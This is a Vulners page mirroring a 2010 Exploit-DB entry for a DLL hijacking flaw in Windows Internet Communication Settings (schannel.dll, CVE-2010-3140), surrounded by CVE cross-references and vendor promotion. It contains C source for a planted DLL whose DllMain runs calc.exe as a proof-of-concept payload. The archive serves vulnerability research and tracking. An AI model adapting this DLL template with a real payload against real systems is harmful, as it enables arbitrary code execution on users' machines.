Lucene search
+L

Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by ALPdaemonType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-3140
25 Aug 201000:00
circl
cve
CVE
CVE-2010-3140
27 Aug 201018:10
cve
cvelist
Cvelist
CVE-2010-3140
27 Aug 201018:10
cvelist
euvd
EUVD
EUVD-2010-3140
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3140
27 Aug 201019:00
nvd
prion
Prion
Design/Logic Flaw
27 Aug 201019:00
prion
/*
# Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit
(schannel.dll)
# Date: 25/08/2010
# Author: ALPdaemon
# Email: ALPdaemon (at) yahoo (dot) com
# Software Link: N/A
# Tested on: Windows XP SP3 English
# Extension: .isp
*/
#include <windows.h>

int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.15065
28